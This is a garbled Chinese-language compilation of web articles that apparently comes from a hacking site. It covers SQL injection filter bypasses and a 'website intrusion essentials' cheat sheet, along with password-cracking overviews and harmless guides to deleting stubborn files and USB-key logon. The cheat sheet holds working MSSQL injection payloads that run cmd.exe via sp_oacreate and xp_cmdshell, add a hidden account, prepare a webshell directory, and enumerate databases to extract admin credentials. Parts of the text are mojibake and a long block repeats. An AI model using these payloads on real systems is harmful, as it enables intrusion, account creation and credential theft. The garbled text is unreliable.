|
一直以來都以為只有空格���,tab鍵和注釋符/**/可以用來切割sql關(guān)鍵字,段時間在邪八看了風迅cms注入漏洞那篇帖子�,才知道原來回車也可以用來作為分割符(以前竟然沒有想到,真是失?�。?���?���;剀嚨腶scii碼是chr(13)&chr(10)�����,至于為什么要兩個連在一起����,這個我也不知道。轉(zhuǎn)換成url編碼形式是%0d%0a��,于是就可以用%0d%0a代替空格pass一些過濾空格的檢查了��。
引申一下���,只用%0d能正常執(zhí)行語句嗎?只用%0a呢�����?測試證明�,用任意一種分割在mssql�、mysql和access里面都是可以的��。
另外�����,關(guān)于mssql的多語句問題�。我以前一直以為必須用分號作為語句的結(jié)尾,后來發(fā)現(xiàn)�,完全不是那樣。類似
select * from table exec xp_cmdshell'xxxxxxxxxx'
select * from table/**/exec xp_cmdshell'xxxxxxxxxx'
select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'
select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'
的語句都是可以正常執(zhí)行的���。而我以前竟然一直不知道����!不過這個貌似跟連接數(shù)據(jù)庫驅(qū)動有關(guān)系�,odbc可以正常執(zhí)行,sqloledb的話就會報錯���。有興趣的繼續(xù)研究吧J
這樣����,以后遇到帶空格過濾關(guān)鍵字的攔截程序��,又可以發(fā)揮發(fā)揮了?��?赡艽蠹以缇椭懒?��,不管怎么說,發(fā)在這里吧���!
最近想起可能還有些ascii碼可以用來在sql語句中代替空格�����,于是寫個腳本測試了一下����,結(jié)果在所有128個低位ascii字符中���,chr(12)也可以在access里用��,不過貌似chr(12)不能出現(xiàn)在and、or之類的關(guān)鍵詞附近��,原因不清楚��。mysql中比access多一個chr(11)可以。至于mssql�����,挖日�,直接從1到32的ascii碼換成字符后都可以正常使用。
當遇到刪不掉的文件應該怎樣處理
在刪除某個文件時����,系統(tǒng)會給出各種各樣的提示,反正就是死活不讓刪�����。造成這種情況的原因主要有三種:一是文件正在被系統(tǒng)使用�,二是文件名中包含系統(tǒng)無法識別的字符,三是用戶權(quán)限不夠����。我們主要研究前兩種情況,下面做了個整理��,幫你解決這個問題��。
一、基本型
1.分步刪除���。如果你刪除的是一個文件夾�����,可以嘗試先將文件夾中的文件刪除��,然后再刪除該文件夾�。還有一種辦法是在該文件夾下面新建一個文件���,再對文件夾執(zhí)行刪除操作�����。
2.改名刪除�。將不能刪除的文件或文件夾改名后再刪除��。
3.結(jié)束進程再刪除����。當你在刪除文件時,如果系統(tǒng)提示"文件正在使用"����,首先檢查一下是否沒有退出與被刪文件相關(guān)的程序,再看看系統(tǒng)進程中是否還有相關(guān)進程保留�����。這種情況常常出現(xiàn)在我們卸載軟件后刪除軟件殘留在系統(tǒng)中文件的時候��。
4.重啟后再刪除����。
5.換個系統(tǒng)再刪除。使用多系統(tǒng)的朋友可以切換到另外一個系統(tǒng)中執(zhí)行刪除操作��,這招比較有效��。單系統(tǒng)的朋友則可以在DOS下使用RD(刪除目錄)或delete命令(刪除文件)或者進入到安全模式底下進行刪除操作�。
6.結(jié)束掉Explorer進程后再刪除。按下Ctrl+Alt+Del鍵打開任務管理器�����,切換到"進程"選項卡�����,結(jié)束掉Explorer進程,這時候桌面會丟失�,不用著急,運行"文件→新任務"���,輸入"cmd"后回車打開命令行窗口��,進入待刪文件所在目 錄�,用RD或delete命令刪除即可��。刪除完畢后再次運行"文件→新任務"命令��,輸入"explorer"后回車��,桌面又回來了�。
7.關(guān)閉預覽功能再刪除。如果你在資源管理器中使用了視頻�����、圖片的預覽功能�����,那么在刪除此類文件時常常不成功��,解決的辦法是關(guān)閉該功能:Windows XP用戶在"開始→運行"中輸入"regsvr32 /u shmedia.dll"即可,Windows 2000用戶則在資源管理器中的空白處單擊鼠標右鍵���,選擇"自定義文件夾"選項,會出現(xiàn)自定義文件夾向?qū)?,進入到"請選擇模板"窗口后,選擇其中的"簡易"便可以禁止視頻預覽了���。
二���、移花接木型
1.覆蓋文件再刪除。在硬盤的另外區(qū)域新建一個和待刪文件同名的文件�,然后剪切并覆蓋待刪文件,最后再刪除該文件���。
2.請常用軟件"兼職"刪除����。我們可以使用Winrar��、FlashFXP���、Nero���、ACDSee來刪除頑固文件�,這種方法往往有奇效���。使用方法非常簡單�,以FlashFXP為例���,只需在本地目錄中瀏覽到待刪文件�����,對其執(zhí)行刪除操作即可����。
注意:使用Winrar來刪除文件的方法跟其它軟件不同���,步驟如下:右鍵單擊待刪除文件或者文件夾����,選擇"添加到檔案文件"菜單�����,在談出窗口中勾選"存檔后刪除源文件",單擊"確定"���,這樣Winrar在創(chuàng)建壓縮文件的同時��,也會幫我們刪除頑固的文件���,我們只 需要將創(chuàng)建的壓縮文件刪除即可����。
3.在別的機器上刪除。如果你處于局域網(wǎng)中����,可以嘗試將待刪文件所在的文件夾的屬性設置為共享,并賦予讀寫權(quán)限����,然后通過網(wǎng)上鄰居或在所在的局域網(wǎng)內(nèi)的其它的電腦上打開文件夾,執(zhí)行刪除操作�。另外如果你電腦中安裝了FTP服務器,我們還可以試試從FTP登錄 本機�����,然后刪除待刪文件。
4.使用專業(yè)刪除軟件�。大名鼎鼎的PC Tools這款小軟件可以刪除幾乎所有"頑固"軟件。運行軟件后��,先按任意鍵進入軟件的主界面���,然后按下F10并切換選中待刪文件�����,按下D鍵并確認操作即可刪除�。
入侵網(wǎng)站必備(經(jīng)典語句)
反向PING自己實驗
;use master;declare @s int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
加帳號
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank> _OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
創(chuàng)建一個虛擬目錄E盤:
;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默認Web站點" -v "e","e: \"--
訪問屬性:(配合寫入一個webshell)
declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
爆庫 特殊_blank>技巧::%5c=\ 或者把/和\ 修改%5提交
and 0<>(select top 1 paths from newtable)--
得到庫名(從1到5都是系統(tǒng)的id�����,6以上才可以判斷)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的_blank>數(shù)據(jù)庫名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一個表 假設為 admin
and 0 <>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 來得到其他的表��。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str (id))) 暴到UID的數(shù)值假設為18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個admin的一個字段,假設為 user_blank>_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,...)) 來暴出其他的字段
and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用戶名
依次可以得到_blank>密碼�����。�。。�。����。假設存在user_blank>_id username ,password 等字段
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判斷id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union�,access也好用)
得到WEB路徑
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE, @key=SYSTEM\CurrentControlSet \Services\W3SVC\Parameters\Virtual Roots\, @value_blank>_name=/, values=@test OUTPUT insert into paths (path) values(@test)--
;use ku1;--
;create table cmd (str image);-- 建立image類型的表cmd
存在xp_blank>_cmdshell的測試過程:
;exec master..xp_blank>_cmdshell dir
;exec master.dbo.sp_blank>_addlogin jiaoniang$;-- 加SQL帳號
分析口令攻擊技術(shù)
攻擊原理
攻擊者攻擊目標時常常把破譯用戶的口令作為攻擊的開始。只要攻擊者能猜測或者確定用戶的口令��,他就能獲得機器或者網(wǎng)絡的訪問權(quán)���,并能訪問到用戶能訪問到的任何資源�。如果這個用戶有域管理員或root用戶權(quán)限��,這是極其危險的���。
分析口令攻擊這種方法的前提是必須先得到該主機上的某個合法用戶的帳號,然后再進行合法用戶口令的破譯���。獲得普通用戶帳號的方法很多��,如:
利用目標主機的Finger功能:當用Finger命令查詢時��,主機系統(tǒng)會將保存的用戶資料(如用戶名�����、登錄時間等)顯示在終端或計算機上���;
利用目標主機的X.500服務:有些主機沒有關(guān)閉X.500的目錄查詢服務���,也給攻擊者提供了獲得信息的一條簡易途徑;
從電子郵件地址中收集:有些用戶電子郵件地址常會透露其在目標主機上的帳號�����;查看主機是否有習慣性的帳號:有經(jīng)驗的用戶都知道����,很多系統(tǒng)會使用一些習慣性的帳號,造成帳號的泄露�����。
這又有三種方法:
(1)是通過網(wǎng)絡監(jiān)聽非法得到用戶口令���,這類方法有一定的局限性�,但危害性極大��。監(jiān)聽者往往采用中途截擊的方法也是獲取用戶帳戶和密碼的一條有效途徑。當前���,很多協(xié)議根本就沒有采用任何加密或身份認證技術(shù)��,如在Telnet���、FTP、HTTP�����、SMTP等傳輸協(xié)議中����,用戶帳戶和密碼信息都是以明文格式傳輸?shù)模藭r若攻擊者利用數(shù)據(jù)包截取工具便可很容易收集到你的帳戶和密碼�����。還有一種中途截擊攻擊方法���,它在你同服務器端完成"三次握手"建立連接之后,在通信過程中扮演"第三者"的角色��,假冒服務器身份欺騙你,再假冒你向服務器發(fā)出惡意請求��,其造成的后果不堪設想�。另外,攻擊者有時還會利用軟件和硬件工具時刻監(jiān)視系統(tǒng)主機的工作����,等待記錄用戶登錄信息,從而取得用戶密碼��;或者編制有緩沖區(qū)溢出錯誤的SUID程序來獲得超級用戶權(quán)限���。
(2)是在知道用戶的賬號后(如電子郵件@前面的部分)利用一些專門軟件強行破解用戶口令����,這種方法不受網(wǎng)段限制����,但攻擊者要有足夠的耐心和時間。如:采用字典窮舉法(或稱暴力法)來破解用戶的密碼�����。攻擊者可以通過一些工具程序��,自動地從電腦字典中取出一個單詞,作為用戶的口令���,再輸入給遠端的主機���,申請進入系統(tǒng);若口令錯誤����,就按序取出下一個單詞,進行下一個嘗試�����,并一直循環(huán)下去���,直到找到正確的口令或字典的單詞試完為止���。由于這個破譯過程由計算機程序來自動完成,因而幾個小時就可以把上十萬條記錄的字典里所有單詞都嘗試一遍���。
(3)是利用系統(tǒng)管理員的失誤。在現(xiàn)代的Unix操作系統(tǒng)中���,用戶的基本信息存放在passwd文件中����,而所有的口令則經(jīng)過DES加密方法加密后專門存放在一個叫shadow的文件中。黑客們獲取口令文件后��,就會使用專門的破解DES加密法的程序來解口令���。同時����,由于為數(shù)不少的操作系統(tǒng)都存在許多安全漏洞�����、Bug或一些其他設計缺陷����,這些缺陷一旦被找出,黑客就可以長驅(qū)直入��。例如�����,讓Windows95/98系統(tǒng)后門洞開的BO就是利用了Windows的基本設計缺陷。���、放置特洛伊木馬程序
特洛伊木馬程序可以直接侵入用戶的電腦并進行破壞��,它常被偽裝成工具程序或者游戲等誘使用戶打開帶有特洛伊木馬程序的郵件附件或從網(wǎng)上直接下載��,一旦用戶打開了這些郵件的附件或者執(zhí)行了這些程序之后��,它們就會象古特洛伊人在敵人城外留下的藏滿士兵的木馬一樣留在自己的電腦中���,并在自己的計算機系統(tǒng)中隱藏一個可以在windows啟動時悄悄執(zhí)行的程序。當您連接到因特網(wǎng)上時���,這個程序就會通知攻擊者��,來報告您的IP地址以及預先設定的端口��。攻擊者在收到這些信息后��,再利用這個潛伏在其中的程序�����,就可以任意地修改你的計算機的參數(shù)設定�、復制文件��、窺視你整個硬盤中的內(nèi)容等�����,從而達到控制你的計算機的目的����。
口令攻擊類型
(1) 字典攻擊
因為多數(shù)人使用普通詞典中的單詞作為口令���,發(fā)起詞典攻擊通常是較好的開端�。詞典攻擊使用一個包含大多數(shù)詞典單詞的文件�,用這些單詞猜測用戶口令。使用一部1萬個單詞的詞典一般能猜測出系統(tǒng)中70%的口令�����。在多數(shù)系統(tǒng)中�����,和嘗試所有的組合相比����,詞典攻擊能在很短的時間內(nèi)完成��。
?���。?) 強行攻擊
許多人認為如果使用足夠長的口令��,或者使用足夠完善的加密模式�,就能有一個攻不破的口令。事實上沒有攻不破的口令��,這只是個時間問題��。如果有速度足夠快的計算機能嘗試字母���、數(shù)字�����、特殊字符所有的組合���,將最終能破解所有的口令。這種類型的攻擊方式叫強行攻擊�。使用強行攻擊����,先從字母a開始��,嘗試aa�����、ab���、ac等等,然后嘗試aaa���、aab���、aac ……。
攻擊者也可以利用分布式攻擊��。如果攻擊者希望在盡量短的時間內(nèi)破解口令�,他不必購買大量昂貴的計算機。他會闖入幾個有大批計算機的公司并利用他們的資源破解口令���。
(3)是利用系統(tǒng)管理員的失誤�。在現(xiàn)代的Unix操作系統(tǒng)中,用戶的基本信息存放在passwd文件中�����,而所有的口令則經(jīng)過DES加密方法加密后專門存放在一個叫shadow的文件中�。黑客們獲取口令文件后,就會使用專門的破解DES加密法的程序來解口令�。同時,由于為數(shù)不少的操作系統(tǒng)都存在許多安全漏洞�����、Bug或一些其他設計缺陷��,這些缺陷一旦被找出�,黑客就可以長驅(qū)直入。例如���,讓Windows95/98系統(tǒng)后門洞開的BO就是利用了Windows的基本設計缺陷��。�、放置特洛伊木馬程序
特洛伊木馬程序可以直接侵入用戶的電腦并進行破壞�����,它常被偽裝成工具程序或者游戲等誘使用戶打開帶有特洛伊木馬程序的郵件附件或從網(wǎng)上直接下載,一旦用戶打開了這些郵件的附件或者執(zhí)行了這些程序之后�,它們就會象古特洛伊人在敵人城外留下的藏滿士兵的木馬一樣留在自己的電腦中,并在自己的計算機系統(tǒng)中隱藏一個可以在windows啟動時悄悄執(zhí)行的程序���。當您連接到因特網(wǎng)上時���,這個程序就會通知攻擊者,來報告您的IP地址以及預先設定的端口�。攻擊者在收到這些信息后�����,再利用這個潛伏在其中的程序��,就可以任意地修改你的計算機的參數(shù)設定��、復制文件����、窺視你整個硬盤中的內(nèi)容等,從而達到控制你的計算機的目的����。
口令攻擊類型
?����。?) 字典攻擊
因為多數(shù)人使用普通詞典中的單詞作為口令�����,發(fā)起詞典攻擊通常是較好的開端�。詞典攻擊使用一個包含大多數(shù)詞典單詞的文件��,用這些單詞猜測用戶口令�。使用一部1萬個單詞的詞典一般能猜測出系統(tǒng)中70%的口令。在多數(shù)系統(tǒng)中���,和嘗試所有的組合相比�����,詞典攻擊能在很短的時間內(nèi)完成���。
(2) 強行攻擊
許多人認為如果使用足夠長的口令�����,或者使用足夠完善的加密模式,就能有一個攻不破的口令�。事實上沒有攻不破的口令,這只是個時間問題����。如果有速度足夠快的計算機能嘗試字母、數(shù)字���、特殊字符所有的組合�,將最終能破解所有的口令����。這種類型的攻擊方式叫強行攻擊���。使用強行攻擊���,先從字母a開始,嘗試aa���、ab����、ac等等,然后嘗試aaa�、aab、aac ……�。
攻擊者也可以利用分布式攻擊。如果攻擊者希望在盡量短的時間內(nèi)破解口令���,他不必購買大量昂貴的計算機�����。他會闖入幾個有大批計算機的公司并利用他們的資源破解口令�。
?���。?)NTCrack
NTCrack是UNIX破解程序的一部分,但是在NT環(huán)境下破解�����。NTCrack與UNIX中的破解類似�,但是NTCrack在功能上非常有限。它不象其他程序一樣提取口令哈希���,它和NTSweep的工作原理類似�����。必須給NTCrack一個user id和要測試的口令組合�����,然后程序會告訴用戶是否成功�。
(4)PWDump2
PWDump2不是一個口令破解程序����,但是它能用來從SAM數(shù)據(jù)庫中提取口令哈希。L0phtcrack已經(jīng)內(nèi)建了這個特征����,但是PWDump2還是很有用的。首先���,它是一個小型的、易使用的命令行工具�����,能提取口令哈希;其次����,目前很多情況下L0phtcrack的版本不能提取口令哈希。如SYSTEM是一個能在NT下運行的程序���,為SAM數(shù)據(jù)庫提供了很強的加密功能���,如果SYSTEM在使用,L0phtcrack就無法提取哈?���?诹睿荘WDump2還能使用���;而且要在windows2000下提取哈?�?诹?����,必須使用PWDump2���,因為系統(tǒng)使用了更強的加密模式來保護信息�。
UNIX口令破解程序:
?�。?) Crack
Crack是一個旨在快速定位UNIX口令弱點的口令破解程序�����。Crack使用標準的猜測技術(shù)確定口令�����。它檢查口令是否為如下情況之一:和user id相同��、單詞password�����、數(shù)字串��、字母串��。Crack通過加密一長串可能的口令�����,并把結(jié)果和用戶的加密口令相比較���,看其是否匹配�����。用戶的加密口令必須是在運行破解程序之前就已經(jīng)提供的�����。
?��。?) John the Ripper
UNIX口令破解程序,但也能在Windows平臺運行���,功能強大����、運行速度快�,可進行字典攻擊和強行攻擊。
?�。?) XIT
XIT是一個執(zhí)行詞典攻擊的UNIX口令破解程序��。XIT的功能有限,因為它只能運行詞典攻擊��,但程序很小��、運行很快�����。
?���。?) Slurpie
Slurpie能執(zhí)行詞典攻擊和定制的強行攻擊,要規(guī)定所需要使用的字符數(shù)目和字符類型����。如,可以能夠Slurpie發(fā)起一次攻擊�,使用7字符或8字符、僅使用小寫字母口令進行強行攻擊�。
和John、Crack相比�����,Slurpie最大的優(yōu)點是它能分布運行�,Slurpie能把幾臺計算機組成一臺分布式虛擬機器在很短的時間里完成破解任務。
用U盤進入有密碼的Windows系統(tǒng)
教你用U盤進入有密碼的Windows系統(tǒng) U盤如今可以說非常普及了,不過�,如果只是把它用來存儲數(shù)據(jù)的話,也許有點可惜了����。其實���,我們還可以讓U盤發(fā)揮更大的能量����!今天小編教你一招�����,能讓你的U盤代替登錄系統(tǒng)的密碼����,只有當你插上U盤才能正常進入系統(tǒng)操作,否則任何操作都無法進入系統(tǒng)��。怎么樣�,是不是很有興趣一試?
要想成功實現(xiàn)上述功能����,我們需要借助名為Disklogon的小工具��,它是一個功能強大的安全設置工具�����,可讓我們使用優(yōu)盤�、軟盤等移動設備來登錄系統(tǒng)�,可在登錄時免于輸入用戶名和登錄密碼;而一旦移走了這些設備����,系統(tǒng)便可以設置為自動鎖定或關(guān)機。下面就來看看如何設置讓優(yōu)盤變成控制登錄系統(tǒng)的"密鑰盤"��。
點擊進入Disklogon下載頁面
完成軟件安裝之后按要求重新啟動����,之后在進入系統(tǒng)的畫面中單擊"Password"按鈕,然后使用鍵盤輸入密碼登錄(如果之前設置了使用密碼登錄的話)�。但我們是不希望每次都這樣繁瑣的,下面就來設置一下讓優(yōu)盤發(fā)揮更強大的功能��,讓它直接來控制系統(tǒng)登錄��。
直接開始菜單中單擊"Disklogon Options"進入設置界面,隨后依次執(zhí)行如下步驟設定:
Step1:依次執(zhí)行"Options/Disklogon/Disks"操作��,窗口右側(cè)中默認將所有的盤符都勾選了���,但我們只希望用優(yōu)盤來作為密鑰盤����,所以只勾選優(yōu)盤的盤符(例如筆者的為L:)�����。
Step2:單擊窗口左側(cè)的"Options/DiskLogon/General"分支����,接下來���,我們要在右側(cè)設置有優(yōu)盤和無優(yōu)盤時的不同操作:
1.在"Disk removal behavior"下拉列表框中選擇"Lock computer when the disk is removed"(當磁盤被取出后將電腦鎖定)�����,這樣當優(yōu)盤被拔除后系統(tǒng)就自動鎖定了��;如果想在拔除優(yōu)盤后自動注銷��,則可選擇"Log off when the disk is removed"�����。
2.在"Log on to Windows"下拉列表框中選擇"Log on when disk is connected"(當鏈接有優(yōu)盤時自動登錄系統(tǒng))��,這樣����,如果在開機后沒有連接優(yōu)盤,則不能進入系統(tǒng)����。
3.在"Unlock computer"下拉列表框中選擇"Unlock computer when the disk is connected"(當連上優(yōu)盤時自動解除對系統(tǒng)的鎖定)。
小貼士:默認情況下�����,系統(tǒng)登錄時����,如果沒有沒有連接優(yōu)盤,用戶可點擊"Cancel"然后手工輸入用戶名和密碼來進入系統(tǒng)����。但為了增強安全性����,去掉"Allow users to type their usename and password to log on or unlock computer"(允許用戶輸入用戶名和密碼來登錄或解鎖系統(tǒng))選項��!如此一來沒有優(yōu)盤插入就無法登陸系統(tǒng)了����。
控制系統(tǒng)登錄之 創(chuàng)建登錄信息
Step3:完成上述設置后,我們就可以進行最后一步設置了���,即登錄系統(tǒng)解鎖時所用的用戶名和密碼。點擊進入"User Accounts"標簽�,隨后點擊"Change Logon information"區(qū)域處的"Change"按鈕,進入用戶名��、密碼創(chuàng)建界面(圖2)����。具體步驟:在"Step1"區(qū)域選擇當前系統(tǒng)中正在使用的U盤,接著點擊"Step2"區(qū)域選擇某ID號(如01)�����,此時"Create New"將呈現(xiàn)可用狀態(tài)��,點擊該按鈕,并在隨后的彈出窗口中輸入用戶名及密碼即可����。
如果希望用加密算法對登錄信息進行加密,可勾選對話框中的"Encrypt this logon information with strong encryption algorithm"選項����。添加完成后單擊"close"按鈕返回主窗口。
小貼士:設置了登錄用戶名和密碼后��,優(yōu)盤根目錄下會生成一個名為logon.dln的文件����,這個文件不能刪除!否則��,下次重新啟動時即使你插上了優(yōu)盤�����,也會因為系統(tǒng)不能讀取"指紋"而導致進不了系統(tǒng)�����!
至此����,所有相關(guān)設置已經(jīng)完成�,現(xiàn)在你的U盤就已經(jīng)是密鑰盤了���。在沒有連接優(yōu)盤的情況下根本是無法進入系統(tǒng)的����;而在系統(tǒng)使用中途����,如果將優(yōu)盤拔除,系統(tǒng)便會自動鎖定-單擊對話框中的"Unlock"也是無效的�����,除非再次將優(yōu)盤連接到電腦中�。目前軟件只支持Windows 2000/XP/2003系統(tǒng)�����。
|
